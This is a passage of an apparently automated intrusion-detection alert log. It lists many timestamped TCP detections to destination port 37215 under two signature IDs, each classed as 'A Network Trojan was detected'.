                Timestamp:06/14/24-10:44:14.672808
                SID:2829579
                Source Port:44060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916665
                SID:2829579
                Source Port:47904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025523
                SID:2835222
                Source Port:38256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177576
                SID:2829579
                Source Port:36548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968955
                SID:2829579
                Source Port:40342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341755
                SID:2829579
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344075
                SID:2829579
                Source Port:33690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146377
                SID:2829579
                Source Port:43706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729257
                SID:2829579
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326017
                SID:2835222
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225967
                SID:2829579
                Source Port:45108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385739
                SID:2829579
                Source Port:55856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368771
                SID:2829579
                Source Port:41330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183357
                SID:2829579
                Source Port:56154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453054
                SID:2829579
                Source Port:50984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917498
                SID:2829579
                Source Port:38234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791047
                SID:2835222
                Source Port:58068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163621
                SID:2835222
                Source Port:38872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942993
                SID:2835222
                Source Port:50104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.042534
                SID:2829579
                Source Port:54486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289664
                SID:2835222
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943847
                SID:2829579
                Source Port:50040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186314
                SID:2835222
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150486
                SID:2835222
                Source Port:34378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942825
                SID:2829579
                Source Port:53546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018177
                SID:2835222
                Source Port:46958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367706
                SID:2835222
                Source Port:34946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023471
                SID:2829579
                Source Port:37628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861287
                SID:2829579
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502904
                SID:2829579
                Source Port:46244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146127
                SID:2835222
                Source Port:45798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184045
                SID:2835222
                Source Port:53454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293237
                SID:2835222
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943873
                SID:2835222
                Source Port:41978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897214
                SID:2835222
                Source Port:40686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405883
                SID:2829579
                Source Port:54718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384174
                SID:2835222
                Source Port:33466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420333
                SID:2829579
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186468
                SID:2835222
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084207
                SID:2829579
                Source Port:49814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295236
                SID:2835222
                Source Port:46978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.516921
                SID:2835222
                Source Port:44820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761094
                SID:2835222
                Source Port:37252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906359
                SID:2835222
                Source Port:60016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243940
                SID:2829579
                Source Port:39470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565757
                SID:2829579
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614118
                SID:2835222
                Source Port:47352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777898
                SID:2829579
                Source Port:47278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015058
                SID:2835222
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045796
                SID:2835222
                Source Port:55840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143016
                SID:2829579
                Source Port:46894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716729
                SID:2829579
                Source Port:46494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668299
                SID:2829579
                Source Port:32794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569405
                SID:2829579
                Source Port:39040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230012
                SID:2835222
                Source Port:55196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971262
                SID:2835222
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276940
                SID:2835222
                Source Port:39384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092225
                SID:2829579
                Source Port:57628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940585
                SID:2835222
                Source Port:40398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849802
                SID:2829579
                Source Port:51890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763662
                SID:2835222
                Source Port:46862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029274
                SID:2829579
                Source Port:52400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737239
                SID:2835222
                Source Port:33638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775883
                SID:2835222
                Source Port:37286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182577
                SID:2835222
                Source Port:51506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968115
                SID:2835222
                Source Port:59386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383429
                SID:2829579
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616533
                SID:2829579
                Source Port:58794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453201
                SID:2829579
                Source Port:36244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808044
                SID:2829579
                Source Port:39724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804334
                SID:2835222
                Source Port:52552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806088
                SID:2829579
                Source Port:56266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242349
                SID:2829579
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178672
                SID:2829579
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718489
                SID:2835222
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013557
                SID:2829579
                Source Port:51490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023054
                SID:2835222
                Source Port:45360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662651
                SID:2835222
                Source Port:46510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452462
                SID:2829579
                Source Port:34454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905822
                SID:2829579
                Source Port:35942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071921
                SID:2835222
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343883
                SID:2829579
                Source Port:57450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805119
                SID:2829579
                Source Port:51812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243219
                SID:2829579
                Source Port:33556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163978
                SID:2829579
                Source Port:59264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340678
                SID:2835222
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775831
                SID:2835222
                Source Port:58240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253931
                SID:2835222
                Source Port:60966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567661
                SID:2835222
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859762
                SID:2835222
                Source Port:43706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181249
                SID:2829579
                Source Port:46260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700306
                SID:2829579
                Source Port:39260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366480
                SID:2829579
                Source Port:39220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828205
                SID:2829579
                Source Port:60270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028933
                SID:2835222
                Source Port:39124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549232
                SID:2835222
                Source Port:34854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503637
                SID:2829579
                Source Port:38650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519796
                SID:2829579
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668926
                SID:2829579
                Source Port:56720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112020
                SID:2835222
                Source Port:49168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969454
                SID:2829579
                Source Port:38594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517850
                SID:2835222
                Source Port:52434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369355
                SID:2835222
                Source Port:48042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017009
                SID:2835222
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804639
                SID:2829579
                Source Port:37306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029492
                SID:2835222
                Source Port:41122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646868
                SID:2829579
                Source Port:54508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242032
                SID:2829579
                Source Port:50324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847609
                SID:2835222
                Source Port:36102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504245
                SID:2829579
                Source Port:37296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163666
                SID:2829579
                Source Port:55030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944645
                SID:2829579
                Source Port:35502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021552
                SID:2829579
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942742
                SID:2829579
                Source Port:53714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898324
                SID:2835222
                Source Port:34198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365354
                SID:2835222
                Source Port:40196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846796
                SID:2829579
                Source Port:57262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052671
                SID:2835222
                Source Port:40446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074096
                SID:2829579
                Source Port:53294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131289
                SID:2829579
                Source Port:57794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024437
                SID:2835222
                Source Port:60486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407245
                SID:2829579
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715160
                SID:2829579
                Source Port:55396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411996
                SID:2835222
                Source Port:43468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517822
                SID:2829579
                Source Port:54254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966639
                SID:2829579
                Source Port:60866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792277
                SID:2835222
                Source Port:35368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700909
                SID:2835222
                Source Port:46328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703350
                SID:2829579
                Source Port:50126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032361
                SID:2829579
                Source Port:53186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324376
                SID:2835222
                Source Port:54534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846376
                SID:2829579
                Source Port:40172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032989
                SID:2829579
                Source Port:36812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134766
                SID:2835222
                Source Port:51214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.613791
                SID:2829579
                Source Port:38376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997493
                SID:2835222
                Source Port:46304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517797
                SID:2829579
                Source Port:40562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338345
                SID:2835222
                Source Port:38566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324203
                SID:2835222
                Source Port:36734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790923
                SID:2835222
                Source Port:46038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569487
                SID:2835222
                Source Port:48292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.935478
                SID:2829579
                Source Port:33536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381307
                SID:2829579
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828232
                SID:2835222
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792440
                SID:2829579
                Source Port:39598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337246
                SID:2835222
                Source Port:33598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132836
                SID:2835222
                Source Port:48556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449093
                SID:2829579
                Source Port:59250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293638
                SID:2835222
                Source Port:35188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470907
                SID:2835222
                Source Port:51300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789234
                SID:2829579
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967438
                SID:2829579
                Source Port:51772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148476
                SID:2835222
                Source Port:47642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178948
                SID:2829579
                Source Port:37106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941783
                SID:2835222
                Source Port:47686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295432
                SID:2829579
                Source Port:38812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676584
                SID:2835222
                Source Port:59940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.028042
                SID:2835222
                Source Port:56356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718289
                SID:2829579
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902485
                SID:2835222
                Source Port:33692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861191
                SID:2829579
                Source Port:52392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704326
                SID:2829579
                Source Port:51792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082575
                SID:2829579
                Source Port:41170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411917
                SID:2829579
                Source Port:36384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897944
                SID:2829579
                Source Port:50262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338679
                SID:2829579
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502056
                SID:2835222
                Source Port:46054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150785
                SID:2829579
                Source Port:55738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804505
                SID:2829579
                Source Port:53726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677803
                SID:2829579
                Source Port:43130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679469
                SID:2829579
                Source Port:42234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807694
                SID:2829579
                Source Port:45972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683898
                SID:2835222
                Source Port:56234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030408
                SID:2835222
                Source Port:59414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164316
                SID:2829579
                Source Port:49040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660518
                SID:2835222
                Source Port:48242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183786
                SID:2829579
                Source Port:59658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025336
                SID:2835222
                Source Port:50242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862218
                SID:2835222
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072337
                SID:2829579
                Source Port:35210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942044
                SID:2829579
                Source Port:33782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520668
                SID:2835222
                Source Port:45170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717054
                SID:2835222
                Source Port:39658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198276
                SID:2829579
                Source Port:39972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569229
                SID:2829579
                Source Port:46314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226702
                SID:2835222
                Source Port:55142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790702
                SID:2835222
                Source Port:54766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017807
                SID:2829579
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689241
                SID:2829579
                Source Port:55364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324119
                SID:2835222
                Source Port:51480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408825
                SID:2835222
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087948
                SID:2829579
                Source Port:39924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676941
                SID:2835222
                Source Port:52570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164789
                SID:2829579
                Source Port:36076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645354
                SID:2829579
                Source Port:40646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183323
                SID:2835222
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518773
                SID:2835222
                Source Port:43824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520212
